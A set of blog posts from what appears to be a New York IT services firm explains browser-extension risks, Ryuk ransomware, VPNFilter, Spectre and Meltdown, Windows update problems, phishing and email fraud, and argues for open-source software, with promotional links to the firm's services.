Protecting Yourself from Browser Extensions

A couple weeks ago I enjoyed reading The Innovators: How a Group of Hackers, Geniuses, and Geeks Created the Digital Revolution by Walter Isaacson. It’s a worthwhile read. One of the many things that stood out to me is how far internet browsers have come from the limited early 90’s Nexus and Mosaic browsers to the browsers we all enjoy today. Modern browsers are so powerful that they are making countless users “operating system agnostic”: whether on a PC, Mac, Linux machine or chromebook – open a browser and many people are good to go for work and leisure. As is always the case, with this wonderful increased functionality comes new vulnerabilities to your computer’s resources and personal data. Let’s talk about extensions…

What is a browser extension?

Modern web browsers’ functionality can be extended through small applications that are added to the browser program by the user. Usually, these applets are called extensions (Chrome, Firefox, Opera, Safari, Edge) or Add-Ons (Internet Explorer). Some extensions can provide measurable benefit to the user: for Google GSuite users, adding the GSuite extensions to Chrome will enable additional functionality like offline-mode to Google’s online office suite. Tens of thousands of users have found the extension Grammarly to both help them in their writing whilst sparing them the embarrassment of grammatical faux pas in their emails. So while some are indisputably useful, many users may be unwitting running extensions that are working against them.

pexels-photo-67112

What’s the Danger?

Extensions give the creator various kinds of access to your system, browsing habits and even personal data. The browser extension web stores will try to vet and actively shut down outright malicious extensions. Whereas many clients are unable to install new programs on their machines apart from an admin login, browser extensions work differently allowing the user to get around that protective measure. When a user reports to us that their system “isn’t quite working right,” we’ll often find a number of (inadvertently installed) browser extensions that are doing who knows what in the background: maybe redirecting search results, or taking over one’s home page, displaying extra ads, generating pop-ups, or maybe hogging system resources for things like mining cryptocurrency for the extension creator with your computer

photo-1542355187331-3a0f1049318e

Installation Guidance

Before adding an extension to your browser, be sure you can answer yes to all the following questions:

  1. Do I know exactly what this extension does and what kind of data it will have access to? (Be very distrustful of sites that offer a one-click option to add an extension now that you didn’t know you needed. Please, no.) 
  2. Do I know why I’m adding this extension or what known value will it give me?
  3. Do I trust the maker of the extension? (Google is your friend, but if it was unexpectedly suggested to you by a site, be leery.)

photo-1484480974693-6ca0a78fb36b

The Power of Sync

Have you noticed that most modern browsers allow you to log into the browser? This lets you keep things like your browsing history, stored passwords, and auto-fill information consistent with whatever device you happen to be on. This also means if you install an extension on one device, it will often, by design, sync to all your other devices. So the hurt of one careless click can follow you around your digital life, but, thankfully, so can the cleanup.

photo-1544723680-19b15fece0b1

Cleaning up

We’ll conclude the post with directions specific to each browser for cleaning up the extensions on Chrome, Opera, Firefox, Safari, Edge and Internet Explorer. Once you follow the screenshots to navigate to the extension manager, you can disable–or better, remove–everything listed that you didn’t intentionally add or actually use. For most users, that will mean removing all extensions shown. Enjoy your new cleaned up browsing experience!

photo-1527515637462-cff94eecc1ac

Google Chrome: 

  • Click the 3-dot settings icon in the top right corner
  • Select “More Tools”
  • Select “Extensions”

    Screen Shot 2019-07-25 at 4.23.24 PM

  • Select the “Remove” button (toggle switch disables)

    Screen Shot 2019-07-25 at 4.23.39 PM

Opera:

  • Click “View” on the menu bar
  • Select “Show Extensions”

    Screen Shot 2019-07-25 at 4.23.50 PM

  • Disable button to disable or the “X” in the top right of the card to remove

    Screen Shot 2019-07-25 at 4.24.03 PM

Firefox:

  • Click “Tools” on the menu bar
  • Select “Add-ons”

    Screen Shot 2019-07-25 at 4.24.16 PM

  • Select “Extensions” on the left sidebar
  • Disable or Remove

    Screen Shot 2019-07-25 at 4.24.29 PM

Safari:

  • Click “Safari” on the menu bar
  • Select “Preferences”
  • Select the “Extensions” icon in the resulting pop-up window

    Screen Shot 2019-07-25 at 4.24.40 PM

  • Check the individual extension box on the left side-panel
  • Uninstall

    Screen Shot 2019-07-25 at 4.24.53 PM

Internet Explorer:

  • Click the settings gear icon in the top right corner of the browser (just below the close window “X”)
  • Select “Manage add-ons”

    Screen Shot 2019-07-25 at 4.25.07 PM

  • Use the “Enable/Disable” button to toggle (or you can right-click the extension to get the same option)

    Screen Shot 2019-07-25 at 4.25.19 PM

Microsoft Edge:

(Everyone but Edge can be shown in 2 screenshots, surprised?)

  • Click the three horizontal dot settings icon in the top right corner of the browser (just below the close window “X”)
  • Select “Extensions”

    Screen Shot 2019-07-25 at 4.25.30 PM

  • Check the toggle switch to disable/enable
  • Use the vanishing gear icon to the right of the extension card to uninstall

    Screen Shot 2019-07-25 at 4.25.43 PM

  • Uninstall

    Screen Shot 2019-07-25 at 4.25.54 PM

Photo Credits:

http://www.pexels.com
unsplash.com

 

Advertisement

Ransomeware Attacks on the rise

Ransomware attacks on businesses continue to increase. One particularly nasty attack combination utilizes a trifecta of malware (Emotet, TrickBot, and Ryuk).

How does it start?

  • Often through a phishing email with a malicious attachment/link that infects the user’s computer with the Emotet malware.
  • Emotet opens the door for another malware, TrickBot, that can mine user data and credentials from the local network along with opening a delivery path for the final attack.
  • Ryuk encrypts key files on targeted machines/servers, demanding a Bitcoin ransom for the unique unlock code.

photo-1538766017398-415434a31a5b

The endgame of this attack is Ryuk, a recent ransomware variant becoming infamous for large Bitcoin ransom demands (15-50 BTC). It is the successor to a variant dubbed Hermes which targeted internet-facing servers with weak credentials via RDP. Researchers tracking the spread of Ryuk are estimating that it has pulled in nearly 4 million dollars in ransoms so far within the first 5 months its appearance.  (https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware)

 

photo-1523759724146-4ce060fff7be.jpg

At present, this three-part attach has been limited to select targets.

This past Christmas, the California-based cloud provider Data Resolution was taken down by this infectious trio along with 30,000 businesses that depended on its services. About a week later, the Los Angeles Times’ Olympic printing plant was hit delaying the West Coast distribution of the Wall Street Journal and New York Times. (https://www.sdxcentral.com/articles/news/ryuk-ransomware-takes-down-cloud-hosting-providers-systems/2019/01/) Some have suggested the attackers have ties to N. Korea (the same group that produced the WannaCry hack in 2017) but the evidence so far remains inconclusive.

nice-ransomnote.png

(screenshot of Ryuk’s ransom note)

While it may be a longshot that you will be hit by this specific attack, some simple preventative measures could save you and your company a great deal of heartache later.

Prevention

  • Use a reliable Antivirus software and keep it updated
  • Beware of suspicious emails (links)
    • Whatever the From name, is the email correct?
    • Is it asking for urgent payment and coming at odd hours or from unfamiliar private email accounts?
    • Were you expecting an attachment from this person?
    • Many of our clients have been hit with a much simpler attack — an email directly to them purporting to have hacked the client’s email account and recorded suspicious browser history, and demanding an immediate bitcoin ransom before sharing their browsing history with all the contacts. (In every case, we were able to determine for them that the threat was overblown and the ransom demands safely ignored.) See the example text below:

ransom

  • If you’re unsure, call the person at a known contact number to confirm. Or contact your IT team for questionable emails. They can help you trace a message’s source and reliability.
  • Ask your IT team if your network’s firewall supports GeoIP to block malicious calls to known problematic IPs.

More info

Re: Ryuk vs Hermes https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

Re: Ryuk Attack Details https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/

See blog post links: https://manhattancomputer.wordpress.com/2017/02/27/protect-yourself-from-costly-email-scams/ https://manhattancomputer.wordpress.com/2017/10/20/phishing-emails-in-detail/

New router microcode hack overview: VPNFilter

A new microcode router hack has recently been on the air. A router is a device that connects you to the internet and often is the only line of defense against someone connecting to your computer. Even if they would not connect to your computer they can monitor network data transfer to fetch passwords and gather other information. The number of affected routers continues to grow; estimates are 500,000 affected (though latest reports are now saying possibly as many as a million across 54 countries). Brands like Netgear, ASUS, Linksys, TP-Link, Ubiquiti and many others. The extent, capabilities, and purposes of the hack are being actively investigated. Two weeks ago the FBI was able to seize one of the main servers involved in this hack, but the threat continues to persist and evolve.

 

coding-computer-data-577585

A Closer Look at Computer Microcode

To understand why this particular hack is so troubling, a high-level review on how computers work will be helpful. As you might know, computers, at a very basic level, are simple mathematical devices that process binary numbers (1101001 + 101101, etc.). They are entirely unaware of the complex programs you see on your computer’s screen. A tiny small program – microcode – starts, explaining to the processor how to deal with the rest of the information it is going to receive, giving the initial instructions for loading an operating system. Once the operating system is up, it allows you to run software programs on your computer that you interact with on your screen.

 

chips-circuit-board-computer-4316

Microcode-Level Exploits

All devices that are chip-based (routers, wifi hotspots, NAS, cellphones, computers, smartwatches, etc.) use microcode that’s specific for the processors and hardware that the devices use. When a hack or exploit targets the lower-level microcode, this becomes a very difficult and troubling level of attack. You may recall the Spectre and Meltdown microcode exploits that were all over the news at the beginning of this year? These affected nearly all Intel and to a lesser extent AMD chips made over the last two decades, and because it was a hardware-based exploit, software-based update patches may not be able to fully prevent such hacks (read more of this here). Something similar has happened now to Broadcom’s CFE (Common Firmware Environment) used by many routers.

 

black-and-white-computer-device-163017

How the Attack Works

This attack (named VPNFilter) comes in stages, and the first stage is the most concerning. It installs itself on the lowest level of microcode making it resistant to reboots and many attempts to remove it. This aggressive persistence makes Identifying compromised hardware and defending from this attack quite challenging. The FBI has recommended users to reboot their device, but this is more for them than for the users. While rebooting does remove stages 2 and 3 of the attack, it cannot remove the stage 1 attack, but it will help the FBI determine how much “phoning home” is still happening (and to what IPs) to restore the wiped modules from stages 2 and 3.

Since this malware is designed to run on a lower level than the device’s operating system, there is no accessible way to ensure it is not hacked. Though we may be able to stop VPNFilter from downloading and running harmful modules in the OS, there is no guarantee that using similar methods, hackers will not find another way to use this exploit in the future (if they haven’t already). These devices are no longer safe to be internet facing and serving as routing devices for your company’s business.

 

aged-blocks-bricks-761142

Firewall Protection

At Manhattan Computer we are monitoring the situation, and as the first line of response, we are removing any of these affected devices from having direct internet access. Our custom firewall is more than enough to protect office networks and devices. Behind our firewall, even if they were to get infected, there will be no way for them to “phone home” and do anything more. The organization Talos Intelligence is actively updating Snort signatures and blacklists which our firewall will use to cut off all malicious access VPNFilter tries to obtain.

Defending against this threat is extremely difficult due to the nature of the affected devices. The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers. This challenge is augmented by the fact that most of the affected devices have publicly known vulnerabilities which are not convenient for the average user to patch. Additionally, most have no built-in anti-malware capabilities. These three facts together make this threat extremely hard to counter, resulting in extremely limited opportunities to interdict malware, remove vulnerabilities, or block threats…. We developed and deployed more than 100 Snort signatures for the publicly known vulnerabilities for the devices that are associated with this threat. These rules have been deployed in the public Snort set, and can be used by anyone to help defend their devices. https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

Firewall support is included in our all service packages http://teksperts.nyc/features/

 

Sources:

For an updated list of devices currently known to be affected see:

https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/

Note: Cisco is scheduled to release an update on the situation on June 13.

Images from: https://www.pexels.com/

A Brief on latest issues caused by Windows Update

The status of Windows updates has grown increasingly unpredictable and messy of late. A large part of this relates to the push both from chip vendors (Intel and AMD mostly) and operating system creators (Microsoft here particularly) to patch the serious vulnerabilities that we overview in a previous article. Many of these rushed updates caused more immediate problems that far overshadowed the issues they were meant to solve. Initially, Microsoft was warning users of serious slowdowns affecting older chips that some users would be experiencing, but as the vendor patches starting rolling out, slowdowns were the least of the issues users face. Eventually Intel admitted that the initial patches were flawed and asked users to wait until better updates were released.

Update schedules

january-2290045_1280

In years past, Microsoft Windows updates happened at fairly regular intervals: the second and sometimes fourth Tuesdays of the month. Lately however, the updates have dramatically increased in frequency and number. Some of these updates have been problematic and therefore very disruptive for our clients. For this reason back in January we began blocking the locally run Windows Update Service on our client’s computers while we monitored the situation. Two weeks ago, a few of our clients found their Windows system updating even though the service was blocked. For at least one client, this caused some of his USB ports to stop working. Days lately Microsoft admitted the mistake. Updates were taken through an application called Windows Update Assistant that was previously used to update computers from Windows 7 to Windows 10. Though they are calling it an accident, it’s actually the 3rd time in four months that something like this has happened.

A Measured Approach to Updates

sign-3228713_640

Given the scope and gravity of the CPU vulnerabilities that are trying to be addressed, these update, and issues springing from them, will likely continue for the foreseeable future. We are monitoring the situation and will continue to pursue the best ways to roll-out proven updates when the time is right rather than whatever day Microsoft happens to release the next one on.

And Now for Some Good News…

On a more positive note, Microsoft has recently announced that soon updates will run mostly in the background requiring significantly less down time on the user’s side to install. Provided it works as it should, this will be a welcomed change for anyone who has found themselves staring at an update screen when they really needed to be using their computer.

pasted image 0

Update on the Recently Revealed CPU Vulnerabilities

CPU security flaw in the news:

  • Various chip manufacturers have acknowledged a security vulnerability which we have detailed below.

What do You need to do?

In this particular case, the onerous lies with the chip and operating system vendors to release patches to shore up security on all these systems. The single most important thing a user can do is to be sure that you’re allowing your devices to update. The Windows 10 patch was released last night (Jan 3, 2018); your system should update automatically and to do so Windows will likely be restarting your computer this evening. Be aware that over the next several weeks or even months additional security patches will be being pushed both to your operating system and even some of your programs (like Chrome’s update coming on Jan 23rd).

As your technology partner, we will continue to actively monitor the situation and let you know if any additional action needs to be taken.

Additional Background:

How was this vulnerability was discovered?
Last year Google’s Security Team, Project Zero, discovered several very serious vulnerabilities in CPU hardware architecture affecting a broad range of modern chips over all kinds of operating systems. Since that time, Google has been working with chip manufacturers and operating system vendors to make a concerted effort to patch or mitigate these vulnerabilities before their presence was made more widely known.

Their planned date for release was January 9th, but yesterday (January 3rd) the information was inadvertently made known. Throughout last night and early this morning, vendors have been rushing to push system and CPU microcode updates to various devices a little earlier than planned. Likely you will be seeing updates on your phone, computers, tablets, etc. in the coming days and weeks. In brief, here is what we know:

What does this do?
The exploits potentially allow other programs to be given read-only access to information on the kernel that they have no rights to. So for example a locally run malicious program (or even a malicious JavaScript code run from a web browser) may be able to scrape sensitive data from the CPU such as password and login details that belonged to a separate program process on your computer. At present these exploits cannot delete, run, install anything, or otherwise control your computer, but the exploit may potentially be strung with other attacks in the future to use discovered credentials to further attack a computer.

Who is affected?
A couple major hardware vulnerabilities have been discovered that exploit CPUs at the foundational level of their architecture. These vulnerabilities have been given names: Meltdown and Spectre.

  • Meltdown
    • Appears to affect mostly just Intel CPUs produced in the last 20 years
    • It is the most immediate threat and the easiest presently to exploit
    • Vendors updates will be primarily focused on patching this exploit over the next few days
  • Spectre
    • A more complex and less understood exploit
    • Affects nearly all modern CPUs (regardless of brand) produced in the last couple decades
    • Though similar to a rights escalation vulnerability, some are calling this a new class of vulnerability all to its own
    • The next months and years will continue to see patches designed to mitigate against newly discovered methods of exploiting this vulnerability

While virtually all devices are potential targets, the biggest targets will be the major cloud vendors since they represent a inestimable attack space and a very real treasure trove of information to try to attain. Individual users are far less likely to be made the specific mark of such a targeted attack. Of course even individual users will want to make sure that they are protected as well.

What is being done about it?
Because these are hardware vulnerabilities and because immediately replacing all computer chips twenty years old and newer is completely unreasonable, these vulnerabilities will need to be addressed via software patches and CPU microcode updates. Since addressing a faulty hardware issue with a software update is a an imperfect solution, there is expected to be continuing development on how to best address these vulnerabilities.

As an additional level of defense for your business, our custom firewalls (which we actively monitor) are set up specifically to block malicious access from continuously updated lists of IP addresses reported. Click here for more information on this service.

Further Reading:

Google’s Project Zero’s official announcement on the technical details of the vulnerabilities: https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html

Slide images taken from Intel’s Report on the Side Channel Analysis Security Issue: https://s21.q4cdn.com/600692695/files/doc_presentations/2018/Side-Channel-Analysis-Security.pdf

Anandtech’s continued coverage of new developments on the issue: https://www.anandtech.com/show/12214/understanding-meltdown-and-spectre

Phishing Emails in Detail

Throughout the last couple months malicious/fraudulent emails, also known as phishing emails, have been on the rise in US sector of the Internet. These emails attempt to trick email users to open a malicious webpage or file and are often masked as some legitimate message. Some examples would include:

  • Emails saying that your scanned documents are attached.
  • Warnings that your email mailbox is running out of space that direct you to urgently click the link provided and enter your email account password.
  • Email from your a co-worker (especially a boss) asking you to pay the attached invoice asap.

ransomware-2318381_640

What are these messages and where do they come from?

Hackers break into someone’s computer or server somewhere in the world and gain full control of it. Then they use that computer to send emails to different recipients, as if the person who uses that computer had sent them. As it turns out, the owner of the computer (the legitimate user) is usually completely unaware of the fact that his computer is sending emails, and obviously the hijacker has made sure he will not be traced. The person whose computer is hijacked could be you (on your home computer for example).

Most of the time these malicious emails are sent framing the source of the email to make it look like the email comes from someone you know. For example, gary@manhattan.net receives an email from mike@manhattan.net with some request or the link to open. Our company uses special protection techniques like DMARC (Domain-based Message Authentication, Reporting and Conformance) which prevents others from framing your company email address, making sure that no one but real mike@manhattan.net can send emails with the from field: mike@manhattan.net. This approach not only protects you from receiving phishing emails masquerading as messages from your coworkers, but it also aids other businesses in determining which emails are legitimately coming to them from your company.

Capture

How Do These Emails Get through My Email Service Provider’s Filters?

A growing percentage of phishing emails are employing a character substitution technique that uses easily overlooked non-standard characters/symbols in email names. For example, mike@manhattąn.net with ą being a different character than “a”, though hardly noticeable. In this case, email would successfully get to your email provider (since manhattąn.net is a different domain than the protected manhattan.net). Depending on how good the email provider’s spam filtering is, such an email might get filtered and/or marked as SPAM. Reputable email service providers, like Microsoft or Google, still struggle to identify every phishing email as the phishing techniques are always morphing; they will eventually let some pass on to your inbox. Other email service providers, like yahoo and aol mail, are far less capable in their spam filtering and user’s inboxes end up becoming swamped with spam and phishing emails.

security-2688911_640

Does a Malicious Email Mean my Computer or Network is Insecure?

When your computer gets an email, it is downloading that email from your email service provider’s server. Even though your network is protected from attacks by your firewall and your computer is protected by your antivirus, your computer downloads the phishing email because your email provider’s server is, by default, a trusted location.

Few realize that, Microsoft for example, may pass along phishing emails to other computers. Even though tech corporations are trying to block those emails—those who send them are always working to stay one step ahead so those emails will continue to get through. If you open that email (and especially attachments that it may include), even if you have current antivirus, the content might still be able to take over your computer and lock/access or delete your files. If you open the fake link included in the email (like: chàse.com), you risk giving hackers your login and password by attempting to log into the inauthentic bank site you’re directed to.

Protecting Yourself

Check with your tech security guys and/or your IT provider to explore what measures are in place to protect your business from phishing emails. Ask if they will provide instructions and alerts for your users regarding such activity and ever-evolving cyber threats. Have them give you specific recommendations regarding measures to prevent your business and home computers from being hijacked.

As a security and technology service provider we are the first point of information for our clients regarding phishing emails. Learn more at teksperts.nyc/features

 

All images come from pixabay.com: “Pixabay is a vibrant community of creatives, sharing copyright free images and videos. All contents are released under Creative Commons CC0, which makes them safe to use without asking for permission or giving credit to the artist – even for commercial purposes.”

Confronting the Myth that Proprietary Systems are Safer than Open-Source

Many have the impression that open-source is less secure than its proprietary counterparts. While there are many factors to this assumption, three tend to loom large in people’s thinking. This article will highlight these three misunderstandings, note two additional factors to consider where proprietary systems are uniquely vulnerable, and conclude recommending a viable solution for the security-conscience small business.

1. Misunderstanding “open-source”:

pexels-photo-271639

Some confusion persists regarding what “open-source” means or implies. Unlike say “an open door policy,” open-source does not imply that intruders are given free or easy access past the security measures the software utilizes to keep a business secure.  “Open-source” simply means that anyone is able to freely review the software’s code and suggest improvements to it. (For a fuller explanation of what open-source entails see: here)

2. Supposed dangers of code being open to all:

kid-notebook-computer-learns-159533

Understanding this, some still fear that because all the code is accessible to a would-be-attacker, it would make his job easier to spot holes in the code that he could successfully exploit. While this is not impossible, there are other factors to consider. For one, many thousands of other eyes are also reviewing the same code to find, report, and close those loopholes via patches before they can be successfully exploited.

3. Always patching:

teddy-teddy-bear-association-ill-42230

Patches, in theory, can also be a cause for misunderstanding. You may overhear someone saying that they just don’t trust software that seems to always be in need of patching. While this might sound bad at first (who wants to own a car that is subject to constant recalls?), in the software world this can be a very good thing. Particularly for widely used software, the open-source community is well-known for the speed at which it can push through needful fixes of just-discovered vulnerabilities.

Mark Cox, a leader of the Red Hat Security Response Team, notes:

“A good example of reaction time was with a Linux kernel flaw On Saturday 9, February an exploit was made public that allowed a local unprivileged user to gain root privileges on some Linux kernels (CVE-2008-0600). Within a few hours of it being reported to the kernel mailing list, on 10 February, patches were being exchanged and tested. Later the same day the patches were committed and a new upstream kernel version was released.” (Source)

In addition to these misunderstandings, commercial products are not as secure as their sales marketing team would have you believe. Two additional factors should be considered when evaluating commercial products compared to their open-source counterparts:

1. Leaked Proprietary Source Code

anonymous-studio-figure-photography-facial-mask-38275

The common assumption is that if you keep your source code locked up, then it would be far more difficult for hackers to exploit your product than say it might be for them to find and exploit vulnerabilities in publicly available source code. We’ve addressed already how the open-source community utilizes the open nature of its code as a built-in check to continually improve its security. Commercial software does not have this check. Maybe that would be fine if they can absolutely assure you that their source code will never ever be leaked…. Except that it does leak, again and again and again. Even some of the biggest players in commercial software (Microsoft, Symantec, Adobe, Kaspersky, VMWare, etc.) repeatedly find their closest guarded product code leaked. Suddenly their argument for being more secure because their source code is not publicly available turns on its head. Now primarily malicious eyes are pouring over their code looking for ways to exploit their product while they are left mostly to their own paid employees to try to stem the tide.

2. Delay or Negligence in Pushing Released Patches to their Product

pexels-photo-280352

What is not as commonly considered or understood is the extent to which commercial products depend on their open-source counterparts. The liberal licensing used in most open-source products allows even commercial products to build off of their work. For this reason open-source is everywhere, even if it is unacknowledged, re-branded and sold—uncredited—as part of another product. The danger here is that the end user is unaware of what parts of the commercial product depend on open-source libraries. When a new vulnerability is found in open-source code, the patch is usually quickly distributed. But someone has to apply those patches. Since the commercial product’s code is not public, users have no way of knowing what parts of the commercial product stack are built on open-source code. They have neither the ability to apply the newly released patches nor the knowledge that they need to. The onerous lies on the commercial product vendor to maintain these updates—something that often does not happen. Such delays in (or outright disregard for) updating already-patched issues increases the vulnerability of their product even though the danger is hidden from you, the customer. This is exactly what happened with some companies whose websites were built on the popular commercial CMS product, Joomla.

“Park ‘n Fly and OneStopParking.com suffered from attacks due to an open-sourced based security vulnerability that existed in the Joomla content management platform. A security patch had been issued well before the attack, but unfortunately the patch was never installed.”  – Aaron Tantleff  (Source)

A Way Forward

pexels-photo-256307

Typically small businesses cannot afford either the time or the expense to monitor developments in the security world and implement the necessary corrections in a timely fashion. One possible solution comes from contracting with a Professional IT team who will not only diligently monitor your systems but also offer and implement security recommendations to avoid larger issues later and the needless expenses those can incur. With a technology partner, at far less than the cost of a dedicated employee, safety is not as expensive as you might think.

Take a minute to check our features and services for business http://teksperts.nyc/features.

photos http://www.pexels.com

Which is Better: Open-source or Corporate Platforms?

pic1

Open-source software is developed by various people around the world. It leverages the concept of crowd-development which is similar, in concept, to what crowdfunding does for financial projects. A diverse assortment of skilled developers design purposeful software which they themselves will then use. They do so while freely exchanging the ideas and source code (what is inside the software) with anyone with the hope that others will use it and be willing to participate further in its development. Open-source software is so good that corporations admittedly use it to build and improve their own products. As a result, open-source is everywhere; you will find it your MacBook’s, cellphones, cars, watches…even MRI scanners.

Corporate platforms are devices and services that operate on proprietary software—software that whose source code is only available to the company’s own engineers, in most cases, illegal to alter, and its use is controlled by strict licensing that limits even paying customers to very specific use cases. Examples of such platforms would be Cisco Advanced Security Appliances, MAC OS, and Android phones.

Below (in the ancient Greek manner of a dialogue), we will address common concerns clients might have with using open-source software:

We don’t want to use something made by random people—no one knows who they are.

You are already using open-source software which resides inside corporate-built equipment and systems. They are all based on open-source. Most people participating in open-source development are well known. They even use their work emails and addresses for exchanging information and receiving donations.

What if those open-source people are malicious and will seek to install some kind of backdoor to later hack our business?

They lack the motive. The first users for their software are the developers themselves. I remember when I started using the BSD platform in college—the first thing I did was submit fixes to the driver software to make my computers work faster on the network. This participation in the development process was for my own use, but it benefited everyone else as well.

Even if corporations use open-source, I trust they thoroughly check it before including it in their products.

This is rarely the case. Corporations generally prefer fast profits, rather than paying employees to pour over community code for months on a witch-hunt for issues that may not even be there. Pragmatism drives much of corporate software. But with open-source software, you know someone somewhere is working to make that code just a little better.

We don’t know if there is backdoor in open-source or not.

Hundreds of independent people, who themselves have been screened before participating, review code submitted as open-source, and the code will continuously be reviewed by future users of it. A backdoor is not going to be missed by all those independent reviewers, and collectively, they would lack a motive to keep something like that hidden.

On the other hand, a corporation’s code development can be so divided and their coders so isolated that most will never know if he is developing part of the backdoor code or not. No one, not even developers usually know everything the final product will include.

I still feel there is a possibility of a malicious open-source backdoor that would allow someone to sneak into our systems. Maybe whole development groups are evil.

But you can check over the code yourself or ask someone else to do it for you.

By using corporate platforms you are prevented from reviewing their source code for backdoors (perhaps in part so no one can see how messy and inefficient their code really is!) You just have to blindly trust that corporations are going to do you right, even though you know that many of those platforms have backdoor in them already—usually implemented by government agencies. For example, Avaya phone systems have been found to have modules designed to help spy on foreign governments.

Modern software is not something that allows someone to say take over your computer when you use it and do anything they want on it. Computer systems consist of many blocks (separate open-source developed pieces) interacting between each other and you.

Even if one piece (like some open-source program for instance) starts doing something strange other pieces (like a network packet filter) will see it and either notify you or will make it visible to administrators.

Recent revelations, such as the finding that a common HP audio driver included hidden key logger software (software that actively records all user’s keystrokes—including passwords—to an unencrypted file on the PC), beg the question: are we wise to blindly trust corporations?

Professionals recommend corporate products.

Sometimes this is done merely as a way to save time for them. They don’t usually want to bother providing and supporting secure, custom-built, open-source solutions for small businesses. Many professionals rely on corporate advertising to drive their recommendations and to sell an easy solution. (Advertising is often more like propaganda with a dubious attachment to honest facts.) It takes more than the recommendation of splashy, popular IT solutions to establish the professionalism of an IT service provider. And while they may be selling you the splashy corporate solutions, no doubt at some critical points they are themselves using open-source platforms for power, security and cost efficiency.

I want to support the market’s economic growth by using corporate systems.

This might have short term effect on the economy. But all corporate products have some open-source components inside them. By supporting open-source software you make long term investment into the growth and future development of technology. Without open-source there would be no iPhones, tablets, networks…

People who know the trade will argue that open-source solutions require employing smarter people to work for you, many small businesses cannot afford the $200,000 annual salary of a professional engineer. Typically, small businesses end up hiring amateurs for day-to-day computer fixes and enter never ending cycle of network, security, and server issues.

But there is a better way. For a fraction of the cost, small businesses can team up with outsourced IT companies who employ their own professionals and reap the benefits of better service while keeping costs significantly lower.

Take a minute to check our key features and services your business could be taking advantage of at http://teksperts.nyc/features.

 

 

Add a Professional Tech Team to Your Business?

code

Without a doubt, high performance networking hardware can make things more difficult for an outsider to hack into your company’s network, but new vulnerabilities continue to be found and exploited on even the costliest of equipment. Note, for instance, this torrent of vulnerabilities affecting top-level Cisco products (updated on Cisco’s website):

ciscoerr

The descriptions of many of these vulnerabilities end with warnings like: “An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.” Even something like a VPN connection between your offices set in aggressive mode, remains vulnerable to hacking attacks (with freely available tools such as ikecrack).

While professional grade hardware –is a good first step toward better protecting your company’s data, it can’t be your only step.

Companies, whatever their size, are wise to seek the aid of IT professionals to help them keep an eye on the security of their system, establish better business practices, and monitor their system for suspicious activity that might otherwise easily go unnoticed. Even as a small business, you should have some measures in place for your system to be monitored by an IT professional. This need not require a great deal of time. By establishing a technology partnership with a competent IT company, you can secure the dedicated, protective services you need from experienced professionals (whether standalone or supplementary to your own IT department).

A high-performance firewall is a priority service feature:

features1

Take a minute to check other key features and services your business could be taking advantage of at http://teksperts.nyc/features.

 

Links:

Posted Cisco vulnerabilities: https://tools.cisco.com/security/center/publicationListing.x

VPN aggressive mode hacking tool: http://ikecrack.sourceforge.net

Protect Yourself from Costly Email Scams

scam-gif-w590

Recently one of our clients nearly lost $60,000 to an email scam. Please be advised that even when the email address appears legitimate and even if the money request comes in response to a previous email, confirming via phone or separate email is recommended prior to sending money (particularly internationally).

In April of this year, the FBI released a warning to business owners of a “dramatic increase in business email scams. Two of the most common Business Email Compromise (BEC) attacks involve:

  • Gaining access to internal corporate email accounts from which they then carry out legitimate-looking but fraudulent financial transfers.
  • “Spoofing” a high-level employee’s (CEO, Senior Accountant, etc.) email address from a nearly identical external account of the employee’s business (e.g. BillGates@Mirccom) and then using those accounts to request fraudulent money transfers to private accounts.

Recently, a new and more insidious attack (called “wire-wire”) has come to light. This attack involves scammers collecting publicly available business email addresses. These addresses are then specifically targeted to be infected with malware (usually through an infected email attachment or a malicious web link).

Once infected, the malware transmits screenshots and keylogs which allow the scammers to gain further access to the computer. Noting when a legitimate money transaction is about to take place, scammers can then intercept legitimate outgoing invoices, modify the routing details and pass them to their proper recipients from a very similar-looking email address. Invoices are paid, but the money then is transferred to the scammer’s account. (For more on this process, see the infographic below).

Often the scam is not quickly detected (because the invoice was expected and appeared legitimate) until the payer begins to receive notice from the original payee that payment is now overdue. Currently small to mid-sized business that conduct frequent international money transactions seem to be the primary targets for this attack.

email-scam-linkin

The FBI recommends the following tips for businesses:

  • Be wary of e-mail-only wire transfer requests and requests involving urgency
  • Pick up the phone and verify legitimate business partners.
  • Be cautious of mimicked e-mail addresses
  • Practice multi-level authentication.

SecureWorks via: http://spectrum.ieee.org/techtalk/telecom/security/nigerianscammersinfectthemselveswithownmalwarerevealingnewwirewirefraudscheme

Additional Reading:

https://www.engadget.com/2016/08/08/nigerianemailscammermalware/ http://www.nairaland.com/3270589/nigerianscammersinfectthemselvesown